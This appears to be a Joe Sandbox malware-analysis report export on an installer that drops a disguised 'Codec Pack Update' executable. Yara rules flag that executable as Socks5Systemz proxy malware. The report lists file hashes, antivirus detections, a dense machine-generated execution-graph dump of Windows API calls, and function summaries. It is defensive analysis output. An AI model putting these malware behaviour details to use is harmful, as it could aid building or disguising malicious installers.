                                                                        MD5 hash:D19197438A7371BAAAC62FEC8DABB3D7
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:1
                                                                        Start time:12:57:56
                                                                        Start date:29/03/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp" /SL5="$20420,1594531,54272,C:\Users\user\Desktop\0RWRPBSuDx.exe"
                                                                        Imagebase:0x400000
                                                                        File size:693'760 bytes
                                                                        MD5 hash:D8E53E1B8EA1B12BC3F40BB9F8B14F38
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, Virustotal, Browse
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:2
                                                                        Start time:12:57:57
                                                                        Start date:29/03/2024
                                                                        Path:C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -i
                                                                        Imagebase:0x400000
                                                                        File size:1'765'117 bytes
                                                                        MD5 hash:0E347C627EFDED3BF78AFA21FF8B54D3
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 38%, Virustotal, Browse
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:12:57:57
                                                                        Start date:29/03/2024
                                                                        Path:C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -s
                                                                        Imagebase:0x400000
                                                                        File size:1'765'117 bytes
                                                                        MD5 hash:0E347C627EFDED3BF78AFA21FF8B54D3
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2867940792.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false


                                                                          Execution Graph

                                                                          Execution Coverage:21.1%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:2.3%
                                                                          Total number of Nodes:1514
                                                                          Total number of Limit Nodes:21
6611->6612 6612->6613 6613->6593 6615 40693c 7 API calls 6614->6615 6616 4069b2 GetLastError 6615->6616 6616->6604 6618 406fc7 6617->6618 6636 406fbe 6617->6636 6619 406fd0 6618->6619 6620 407008 6618->6620 6638 406ec8 6619->6638 6622 406ec8 RegOpenKeyExA 6620->6622 6624 407021 6622->6624 6623 406fe9 6625 40703e 6623->6625 6641 406ebc 6623->6641 6624->6625 6627 406ebc 6 API calls 6624->6627 6629 40322c 4 API calls 6625->6629 6631 407035 RegCloseKey 6627->6631 6628 403198 4 API calls 6632 407080 6628->6632 6633 40704b 6629->6633 6631->6625 6634 403198 4 API calls 6632->6634 6635 4032fc 4 API calls 6633->6635 6637 407088 6634->6637 6635->6636 6636->6628 6637->6430 6639 406ed3 6638->6639 6640 406ed9 RegOpenKeyExA 6638->6640 6639->6640 6640->6623 6644 406d70 6641->6644 6645 406d96 RegQueryValueExA 6644->6645 6646 406db9 6645->6646 6659 406ddb 6645->6659 6647 406dd3 6646->6647 6651 403278 4 API calls 6646->6651 6652 403420 4 API calls 6646->6652 6646->6659 6649 403198 4 API calls 6647->6649 6648 403198 4 API calls 6650 406ea7 RegCloseKey 6648->6650 6649->6659 6650->6625 6651->6646 6653 406e10 RegQueryValueExA 6652->6653 6653->6645 6654 406e2c 6653->6654 6655 4034f0 4 API calls 6654->6655 6654->6659 6656 406e6e 6655->6656 6657 406e80 6656->6657 6660 403420 4 API calls 6656->6660 6658 4031e8 4 API calls 6657->6658 6658->6659 6659->6648 6660->6657 6662 4066a4 IsDBCSLeadByte 6661->6662 6665 406795 6662->6665 6663 4067df 6663->6449 6664 4065e0 IsDBCSLeadByte 6664->6665 6665->6663 6665->6664 6667 406853 6666->6667 6668 406780 IsDBCSLeadByte 6667->6668 6671 40685e 6668->6671 6669 40664a 6669->6454 6669->6455 6670 4065e0 IsDBCSLeadByte 6670->6671 6671->6669 6671->6670 6673 4068b7 6672->6673 6674 4068bb 6672->6674 6673->6468 6677 4068d0 CharPrevA 6674->6677 6676 4068cc 6676->6468 6677->6676 5680 407628 WriteFile 5681 407648 5680->5681 5682 40764f 5680->5682 5683 4073ec 21 API calls 5681->5683 5684 407660 5682->5684 5685 40734c 20 API calls 5682->5685 5683->5682 5685->5684 5981 
403a28 ReadFile 5982 403a46 5981->5982 5983 403a49 GetLastError 5981->5983 6682 403932 6683 403924 6682->6683 6684 40374c VariantClear 6683->6684 6685 40392c 6684->6685 6686 408b34 6687 408b3b 6686->6687 6688 403198 4 API calls 6687->6688 6696 408bd5 6688->6696 6689 408c00 6690 4031b8 4 API calls 6689->6690 6691 408c8d 6690->6691 6692 408bec 6694 4032fc 4 API calls 6692->6694 6693 403278 4 API calls 6693->6696 6694->6689 6695 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6695->6696 6696->6689 6696->6692 6696->6693 6696->6695 5990 407ec0 5991 407ee8 5990->5991 5993 407eef 5990->5993 5992 407dfc 21 API calls 5991->5992 5992->5993 5994 407f16 5993->5994 5995 407f18 5993->5995 5997 407f22 5993->5997 6000 4050e4 19 API calls 5994->6000 5998 407d14 19 API calls 5995->5998 5996 407f57 6001 403198 4 API calls 5996->6001 5997->5996 5999 407d14 19 API calls 5997->5999 5998->5997 5999->5996 6002 407f3e 6000->6002 6003 407f6c 6001->6003 6005 407c9c 6002->6005 6006 407c9f 6005->6006 6007 40322c 4 API calls 6006->6007 6008 407cc1 6007->6008 6009 4032fc 4 API calls 6008->6009 6010 407ccb 6009->6010 6011 4057e0 4 API calls 6010->6011 6012 407cda 6011->6012 6013 403198 4 API calls 6012->6013 6014 407cf4 6013->6014 6014->5997 5870 4075cc SetFilePointer 5871 407603 5870->5871 5872 4075f3 GetLastError 5870->5872 5872->5871 5873 4075fc 5872->5873 5874 4073ec 21 API calls 5873->5874 5874->5871 6019 402ccc 6022 402cfe 6019->6022 6023 402cdd 6019->6023 6020 402d88 RtlUnwind 6021 403154 4 API calls 6020->6021 6021->6022 6023->6020 6023->6022 6024 402b28 RaiseException 6023->6024 6025 402d7f 6024->6025 6025->6020 6705 403fcd 6706 403f07 4 API calls 6705->6706 6707 403fd6 6706->6707 6708 403e9c 4 API calls 6707->6708 6709 403fe2 6708->6709 4916 4024d0 4917 4024e4 4916->4917 4918 4024f7 4916->4918 4955 401918 RtlInitializeCriticalSection 4917->4955 4919 402518 4918->4919 4920 40250e RtlEnterCriticalSection 4918->4920 4932 402300 4919->4932 4920->4919 4924 4024ed 4926 402525 4928 
402581 4926->4928 4929 402577 RtlLeaveCriticalSection 4926->4929 4929->4928 4930 402531 4930->4926 4962 40215c 4930->4962 4933 402314 4932->4933 4936 402335 4933->4936 4937 4023b8 4933->4937 4934 402344 4934->4926 4942 401fd4 4934->4942 4936->4934 4976 401b74 4936->4976 4937->4934 4940 402455 4937->4940 4979 401d80 4937->4979 4987 401e84 4937->4987 4940->4934 4983 401d00 4940->4983 4943 401fe8 4942->4943 4944 401ffb 4942->4944 4945 401918 4 API calls 4943->4945 4946 402012 RtlEnterCriticalSection 4944->4946 4949 40201c 4944->4949 4947 401fed 4945->4947 4946->4949 4947->4944 4948 401ff1 4947->4948 4954 402052 4948->4954 4949->4954 5069 401ee0 4949->5069 4952 402147 4952->4930 4953 40213d RtlLeaveCriticalSection 4953->4952 4954->4930 4956 40193c RtlEnterCriticalSection 4955->4956 4957 401946 4955->4957 4956->4957 4958 401964 LocalAlloc 4957->4958 4959 40197e 4958->4959 4960 4019c3 RtlLeaveCriticalSection 4959->4960 4961 4019cd 4959->4961 4960->4961 4961->4918 4961->4924 4963 40217a 4962->4963 4964 402175 4962->4964 4966 4021b5 4963->4966 4967 4021ab RtlEnterCriticalSection 4963->4967 4968 40217e 4963->4968 4965 401918 4 API calls 4964->4965 4965->4963 4969 402244 4966->4969 4972 4021c1 4966->4972 4974 402270 4966->4974 4967->4966 4968->4926 4969->4968 4973 401d80 7 API calls 4969->4973 4970 4022e3 RtlLeaveCriticalSection 4971 4022ed 4970->4971 4971->4926 4972->4970 4972->4971 4973->4968 4974->4972 4975 401d00 7 API calls 4974->4975 4975->4972 4977 40215c 9 API calls 4976->4977 4978 401b95 4977->4978 4978->4934 4980 401d92 4979->4980 4981 401d89 4979->4981 4980->4937 4981->4980 4982 401b74 9 API calls 4981->4982 4982->4980 4984 401d4e 4983->4984 4985 401d1e 4983->4985 4984->4985 4992 401c68 4984->4992 4985->4934 5047 401768 4987->5047 4989 401e99 4991 401ea6 4989->4991 5058 401dcc 4989->5058 4991->4937 4993 401c7a 4992->4993 4994 401c9d 4993->4994 4995 401caf 4993->4995 5005 40188c 4994->5005 4997 40188c 3 API calls 4995->4997 4998 401cad 4997->4998 4999 401cc5 
4998->4999 5015 401b44 4998->5015 4999->4985 5001 401cd4 5002 401cee 5001->5002 5020 401b98 5001->5020 5025 4013a0 5002->5025 5006 4018b2 5005->5006 5007 40190b 5005->5007 5029 401658 5006->5029 5007->4998 5012 4018e6 5012->5007 5014 4013a0 LocalAlloc 5012->5014 5014->5007 5016 401b61 5015->5016 5017 401b52 5015->5017 5016->5001 5018 401d00 9 API calls 5017->5018 5019 401b5f 5018->5019 5019->5001 5021 401bab 5020->5021 5022 401b9d 5020->5022 5021->5002 5023 401b74 9 API calls 5022->5023 5024 401baa 5023->5024 5024->5002 5026 4013ab 5025->5026 5027 4012e4 LocalAlloc 5026->5027 5028 4013c6 5026->5028 5027->5028 5028->4999 5032 40168f 5029->5032 5030 4016cf 5033 40132c 5030->5033 5031 4016a9 VirtualFree 5031->5032 5032->5030 5032->5031 5034 401348 5033->5034 5041 4012e4 5034->5041 5037 40150c 5039 40153b 5037->5039 5038 401594 5038->5012 5039->5038 5040 401568 VirtualFree 5039->5040 5040->5039 5044 40128c 5041->5044 5045 401298 LocalAlloc 5044->5045 5046 4012aa 5044->5046 5045->5046 5046->5012 5046->5037 5048 401787 5047->5048 5049 40183b 5048->5049 5050 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5048->5050 5051 40132c LocalAlloc 5048->5051 5053 401821 5048->5053 5055 4017d6 5048->5055 5056 4017e7 5049->5056 5065 4015c4 5049->5065 5050->5048 5051->5048 5054 40150c VirtualFree 5053->5054 5054->5056 5057 40150c VirtualFree 5055->5057 5056->4989 5057->5056 5059 401d80 9 API calls 5058->5059 5060 401de0 5059->5060 5061 40132c LocalAlloc 5060->5061 5062 401df0 5061->5062 5063 401df8 5062->5063 5064 401b44 9 API calls 5062->5064 5063->4991 5064->5063 5067 40160a 5065->5067 5066 40163a 5066->5056 5067->5066 5068 401626 VirtualAlloc 5067->5068 5068->5066 5068->5067 5072 401ef0 5069->5072 5070 401f1c 5071 401d00 9 API calls 5070->5071 5074 401f40 5070->5074 5071->5074 5072->5070 5072->5074 5075 401e58 5072->5075 5074->4952 5074->4953 5080 4016d8 5075->5080 5078 401e75 5078->5072 5079 401dcc 9 API calls 5079->5078 5081 4016f4 5080->5081 5082 4016fe 5081->5082 5085 
40132c LocalAlloc 5081->5085 5087 40174f 5081->5087 5089 40175b 5081->5089 5090 401430 5081->5090 5084 4015c4 VirtualAlloc 5082->5084 5086 40170a 5084->5086 5085->5081 5086->5089 5088 40150c VirtualFree 5087->5088 5088->5089 5089->5078 5089->5079 5091 40143f VirtualAlloc 5090->5091 5093 40146c 5091->5093 5094 40148f 5091->5094 5095 4012e4 LocalAlloc 5093->5095 5094->5081 5096 401478 5095->5096 5096->5094 5097 40147c VirtualFree 5096->5097 5097->5094 6030 4028d2 6031 4028da 6030->6031 6032 403554 4 API calls 6031->6032 6033 4028ef 6031->6033 6032->6031 6034 4025ac 4 API calls 6033->6034 6035 4028f4 6034->6035 6710 4019d3 6711 4019ba 6710->6711 6712 4019c3 RtlLeaveCriticalSection 6711->6712 6713 4019cd 6711->6713 6712->6713 5689 409fd8 5720 409460 GetLastError 5689->5720 5692 402f24 5 API calls 5693 409fe4 5692->5693 5694 409fee CreateWindowExA SetWindowLongA 5693->5694 5695 4050e4 19 API calls 5694->5695 5696 40a071 5695->5696 5733 4032fc 5696->5733 5698 40a07f 5699 4032fc 4 API calls 5698->5699 5700 40a08c 5699->5700 5747 406adc GetCommandLineA 5700->5747 5703 4032fc 4 API calls 5704 40a0a1 5703->5704 5752 409888 5704->5752 5708 40a0c6 5709 40a0e6 5708->5709 5710 40a0ff 5708->5710 5774 4093fc 5709->5774 5712 40a118 5710->5712 5715 40a112 RemoveDirectoryA 5710->5715 5713 40a121 73A25CF0 5712->5713 5714 40a12c 5712->5714 5713->5714 5716 40a154 5714->5716 5782 40357c 5714->5782 5715->5712 5718 40a14a 5719 4025ac 4 API calls 5718->5719 5719->5716 5795 404be4 5720->5795 5723 4071e4 5 API calls 5724 4094b7 5723->5724 5798 408ccc 5724->5798 5727 4057e0 4 API calls 5728 4094db 5727->5728 5729 4031b8 4 API calls 5728->5729 5730 4094fa 5729->5730 5731 403198 4 API calls 5730->5731 5732 409502 5731->5732 5732->5692 5734 403300 5733->5734 5735 40333f 5733->5735 5736 4031e8 5734->5736 5737 40330a 5734->5737 5735->5698 5740 4031fc 5736->5740 5744 403254 4 API calls 5736->5744 5738 403334 5737->5738 5739 40331d 5737->5739 5743 4034f0 4 API calls 5738->5743 5741 4034f0 4 API calls 
5739->5741 5742 403228 5740->5742 5745 4025ac 4 API calls 5740->5745 5746 403322 5741->5746 5742->5698 5743->5746 5744->5740 5745->5742 5746->5698 5748 406a50 4 API calls 5747->5748 5749 406b01 5748->5749 5750 403198 4 API calls 5749->5750 5751 406b1f 5750->5751 5751->5703 5753 4033b4 4 API calls 5752->5753 5754 4098c3 5753->5754 5755 4098f5 CreateProcessA 5754->5755 5756 409901 5755->5756 5757 409908 CloseHandle 5755->5757 5758 409460 21 API calls 5756->5758 5759 409911 5757->5759 5758->5757 5812 40985c 5759->5812 5762 40992d 5763 40985c 3 API calls 5762->5763 5764 409932 GetExitCodeProcess CloseHandle 5763->5764 5765 409952 5764->5765 5766 403198 4 API calls 5765->5766 5767 40995a 5766->5767 5767->5708 5768 40969c 5767->5768 5769 4096a4 5768->5769 5773 4096de 5768->5773 5770 403420 4 API calls 5769->5770 5769->5773 5771 4096d8 5770->5771 5816 408da4 5771->5816 5773->5708 5775 409456 5774->5775 5777 40940f 5774->5777 5775->5710 5776 409417 Sleep 5776->5777 5777->5775 5777->5776 5778 409427 Sleep 5777->5778 5780 40943e GetLastError 5777->5780 5832 408ee0 5777->5832 5778->5777 5780->5775 5781 409448 GetLastError 5780->5781 5781->5775 5781->5777 5783 403591 5782->5783 5784 4035a0 5782->5784 5787 4035b6 5783->5787 5790 40359b 5783->5790 5793 4035d0 5783->5793 5785 4035b1 5784->5785 5786 4035b8 5784->5786 5788 403198 4 API calls 5785->5788 5789 4031b8 4 API calls 5786->5789 5787->5718 5788->5787 5789->5787 5790->5784 5794 4035ec 5790->5794 5791 40357c 4 API calls 5791->5793 5793->5787 5793->5791 5794->5787 5849 403554 5794->5849 5796 4050f8 19 API calls 5795->5796 5797 404c02 5796->5797 5797->5723 5799 408cec 5798->5799 5802 408ba4 5799->5802 5803 403198 4 API calls 5802->5803 5811 408bd5 5802->5811 5803->5811 5804 408c00 5805 4031b8 4 API calls 5804->5805 5806 408c8d 5805->5806 5806->5727 5807 408bec 5809 4032fc 4 API calls 5807->5809 5808 403278 4 API calls 5808->5811 5809->5804 5810 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5810->5811 5811->5804 
5811->5807 5811->5808 5811->5810 5813 409870 PeekMessageA 5812->5813 5814 409882 MsgWaitForMultipleObjects 5813->5814 5815 409864 TranslateMessage DispatchMessageA 5813->5815 5814->5759 5814->5762 5815->5813 5817 408db2 5816->5817 5819 408dca 5817->5819 5829 408d3c 5817->5829 5820 408d3c 4 API calls 5819->5820 5821 408dee 5819->5821 5820->5821 5822 407878 InterlockedExchange 5821->5822 5823 408e09 5822->5823 5824 408d3c 4 API calls 5823->5824 5826 408e1c 5823->5826 5824->5826 5825 408d3c 4 API calls 5825->5826 5826->5825 5827 403278 4 API calls 5826->5827 5828 408e4b 5826->5828 5827->5826 5828->5773 5830 4057e0 4 API calls 5829->5830 5831 408d4d 5830->5831 5831->5819 5840 408e94 5832->5840 5834 408ef6 5835 408efa 5834->5835 5836 408f16 DeleteFileA GetLastError 5834->5836 5835->5777 5837 408f34 5836->5837 5846 408ed0 5837->5846 5841 408ea2 5840->5841 5842 408e9e 5840->5842 5843 408ec4 SetLastError 5841->5843 5844 408eab Wow64DisableWow64FsRedirection 5841->5844 5842->5834 5845 408ebf 5843->5845 5844->5845 5845->5834 5847 408ed5 Wow64RevertWow64FsRedirection 5846->5847 5848 408edf 5846->5848 5847->5848 5848->5777 5850 403566 5849->5850 5852 403578 5850->5852 5853 403604 5850->5853 5852->5794 5854 40357c 5853->5854 5855 4035a0 5854->5855 5860 4035d0 5854->5860 5861 40359b 5854->5861 5862 4035b6 5854->5862 5856 4035b1 5855->5856 5857 4035b8 5855->5857 5858 403198 4 API calls 5856->5858 5859 4031b8 4 API calls 5857->5859 5858->5862 5859->5862 5860->5862 5864 40357c 4 API calls 5860->5864 5861->5855 5863 4035ec 5861->5863 5862->5850 5863->5862 5865 403554 4 API calls 5863->5865 5864->5860 5865->5863 6717 4065dc IsDBCSLeadByte 6718 4065f4 6717->6718 6729 402be9 RaiseException 6730 402c04 6729->6730 6040 409ef0 6041 409f15 6040->6041 6042 407878 InterlockedExchange 6041->6042 6043 409f3f 6042->6043 6044 409f4f 6043->6044 6045 409984 4 API calls 6043->6045 6050 40760c SetEndOfFile 6044->6050 6045->6044 6047 409f6b 6048 4025ac 4 API calls 6047->6048 6049 409fa2 6048->6049 
6051 407623 6050->6051 6052 40761c 6050->6052 6051->6047 6053 4073ec 21 API calls 6052->6053 6053->6051 6054 402af2 6055 402afe 6054->6055 6058 402ed0 6055->6058 6059 403154 4 API calls 6058->6059 6061 402ee0 6059->6061 6060 402b03 6061->6060 6063 402b0c 6061->6063 6064 402b25 6063->6064 6065 402b15 RaiseException 6063->6065 6064->6060 6065->6064 6066 405af2 6067 405af4 6066->6067 6068 405b30 6067->6068 6069 405b47 6067->6069 6070 405b2a 6067->6070 6071 405890 5 API calls 6068->6071 6075 404c2c 5 API calls 6069->6075 6070->6068 6073 405b9c 6070->6073 6072 405b43 6071->6072 6076 403198 4 API calls 6072->6076 6074 405900 19 API calls 6073->6074 6074->6072 6077 405b70 6075->6077 6078 405bd6 6076->6078 6079 405900 19 API calls 6077->6079 6079->6072 6731 402dfa 6732 402e26 6731->6732 6733 402e0d 6731->6733 6735 402ba4 6733->6735 6736 402bc9 6735->6736 6737 402bad 6735->6737 6736->6732 6738 402bb5 RaiseException 6737->6738 6738->6736 6739 4097fc 6740 40980b 6739->6740 6741 409815 6739->6741 6740->6741 6742 40983a CallWindowProcA 6740->6742 6742->6741 6102 403a80 CloseHandle 6103 403a90 6102->6103 6104 403a91 GetLastError 6102->6104 6105 404283 6106 4042c3 6105->6106 6107 403154 4 API calls 6106->6107 6108 404323 6107->6108 6747 404185 6748 4041ff 6747->6748 6749 4041cc 6748->6749 6750 403154 4 API calls 6748->6750 6751 404323 6750->6751 6109 403e87 6110 403e4c 6109->6110 6111 403e62 6110->6111 6112 403e7b 6110->6112 6115 403e67 6110->6115 6118 403cc8 6111->6118 6113 402674 4 API calls 6112->6113 6116 403e78 6113->6116 6115->6116 6122 402674 6115->6122 6119 403cd6 6118->6119 6120 403ceb 6119->6120 6121 402674 4 API calls 6119->6121 6120->6115 6121->6120 6123 403154 4 API calls 6122->6123 6124 40267a 6123->6124 6124->6116 5875 40758c ReadFile 5876 4075c3 5875->5876 5877 4075ac 5875->5877 5878 4075b2 GetLastError 5877->5878 5879 4075bc 5877->5879 5878->5876 5878->5879 5880 4073ec 21 API calls 5879->5880 5880->5876 6125 40708e 6126 407078 6125->6126 6127 403198 4 API calls 
6126->6127 6128 407080 6127->6128 6129 403198 4 API calls 6128->6129 6130 407088 6129->6130 6135 403e95 6136 403e4c 6135->6136 6137 403e62 6136->6137 6138 403e7b 6136->6138 6141 403e67 6136->6141 6140 403cc8 4 API calls 6137->6140 6139 402674 4 API calls 6138->6139 6142 403e78 6139->6142 6140->6141 6141->6142 6143 402674 4 API calls 6141->6143 6143->6142 6144 403a97 6145 403aac 6144->6145 6146 403bbc GetStdHandle 6145->6146 6147 403b0e CreateFileA 6145->6147 6157 403ab2 6145->6157 6148 403c17 GetLastError 6146->6148 6152 403bba 6146->6152 6147->6148 6149 403b2c 6147->6149 6148->6157 6151 403b3b GetFileSize 6149->6151 6149->6152 6151->6148 6153 403b4e SetFilePointer 6151->6153 6154 403be7 GetFileType 6152->6154 6152->6157 6153->6148 6158 403b6a ReadFile 6153->6158 6156 403c02 CloseHandle 6154->6156 6154->6157 6156->6157 6158->6148 6159 403b8c 6158->6159 6159->6152 6160 403b9f SetFilePointer 6159->6160 6160->6148 6161 403bb0 SetEndOfFile 6160->6161 6161->6148 6161->6152 5686 4074a8 5687 4074b4 CloseHandle 5686->5687 5688 4074bd 5686->5688 5687->5688 6764 40a1a9 6773 409514 6764->6773 6767 402f24 5 API calls 6768 40a1b3 6767->6768 6769 403198 4 API calls 6768->6769 6770 40a1d2 6769->6770 6771 403198 4 API calls 6770->6771 6772 40a1da 6771->6772 6782 4055fc 6773->6782 6775 40955d 6779 403198 4 API calls 6775->6779 6776 40952f 6776->6775 6788 40716c 6776->6788 6778 40954d 6781 409555 MessageBoxA 6778->6781 6780 409572 6779->6780 6780->6767 6780->6768 6781->6775 6783 403154 4 API calls 6782->6783 6784 405601 6783->6784 6785 405619 6784->6785 6786 403154 4 API calls 6784->6786 6785->6776 6787 40560f 6786->6787 6787->6776 6789 4055fc 4 API calls 6788->6789 6790 40717b 6789->6790 6791 407181 6790->6791 6792 40718f 6790->6792 6793 40322c 4 API calls 6791->6793 6795 4071ab 6792->6795 6796 40719f 6792->6796 6794 40718d 6793->6794 6794->6778 6806 4032b8 6795->6806 6799 407130 6796->6799 6800 40322c 4 API calls 6799->6800 6801 40713f 6800->6801 6802 40715c 6801->6802 6803 4068b0 
CharPrevA 6801->6803 6802->6794 6804 40714b 6803->6804 6804->6802 6805 4032fc 4 API calls 6804->6805 6805->6802 6807 403278 4 API calls 6806->6807 6808 4032c2 6807->6808 6808->6794 6809 4011aa 6810 4011ac GetStdHandle 6809->6810 6169 4028ac 6170 402594 4 API calls 6169->6170 6171 4028b6 6170->6171 6176 4050b0 6177 4050c3 6176->6177 6178 404da8 19 API calls 6177->6178 6179 4050d7 6178->6179 6819 409fb4 6820 409fe4 6819->6820 6821 409fee CreateWindowExA SetWindowLongA 6820->6821 6822 4050e4 19 API calls 6821->6822 6823 40a071 6822->6823 6824 4032fc 4 API calls 6823->6824 6825 40a07f 6824->6825 6826 4032fc 4 API calls 6825->6826 6827 40a08c 6826->6827 6828 406adc 5 API calls 6827->6828 6829 40a098 6828->6829 6830 4032fc 4 API calls 6829->6830 6831 40a0a1 6830->6831 6832 409888 29 API calls 6831->6832 6833 40a0b3 6832->6833 6834 40969c 5 API calls 6833->6834 6835 40a0c6 6833->6835 6834->6835 6836 40a0ff 6835->6836 6837 4093fc 9 API calls 6835->6837 6838 40a118 6836->6838 6841 40a112 RemoveDirectoryA 6836->6841 6837->6836 6839 40a121 73A25CF0 6838->6839 6840 40a12c 6838->6840 6839->6840 6842 40a154 6840->6842 6843 40357c 4 API calls 6840->6843 6841->6838 6844 40a14a 6843->6844 6845 4025ac 4 API calls 6844->6845 6845->6842 6180 401ab9 6181 401a96 6180->6181 6182 401aa9 RtlDeleteCriticalSection 6181->6182 6183 401a9f RtlLeaveCriticalSection 6181->6183 6183->6182

                                                                          Control-flow Graph

                                                                          • Graph image omitted; the executed / not executed colouring of blocks is not recoverable from the text export. Block structure of the function at 409a14 as exported: 409a14-409a38 calls GetSystemInfo and VirtualQuery starting at 00400000; loop 409abd-409ac2 / 409aa9-409abb steps to the next region with VirtualQuery; 409a68-409a79 calls VirtualProtect; 409a81-409a8a calls 409a0c; 409a97-409aa4 calls VirtualProtect again before the next VirtualQuery; exit block 409ac8-409acf.
                                                                          APIs
                                                                          • GetSystemInfo.KERNEL32(?), ref: 00409A26
                                                                          • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409A31
                                                                          • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409A72
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409AA4
                                                                          • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409AB4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ProtectQuery$InfoSystem
                                                                          • String ID:
                                                                          • API String ID: 2441996862-0
                                                                          • Opcode ID: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
                                                                          • Instruction ID: 05782b2e5a8588c9c74d05110837466633af9a4b7a19298b20ab433fd050a55e
                                                                          • Opcode Fuzzy Hash: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
                                                                          • Instruction Fuzzy Hash: D0216FB13003846BD6309A698C85E67B7DC9F85360F18492AFA85E62C3D73DED40CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
                                                                          • Instruction ID: b78bf48cff894a3999656c5243e329942f020ab22272e2e872fdbeeaebf0035e
                                                                          • Opcode Fuzzy Hash: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
                                                                          • Instruction Fuzzy Hash: EDE09271B0021426D711A9699C86AEB735DDB58310F0006BFB904EB3C6EDB49E8046ED
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00408FE8
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408FEE
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00409002
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00409008
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                          • API String ID: 1646373207-2130885113
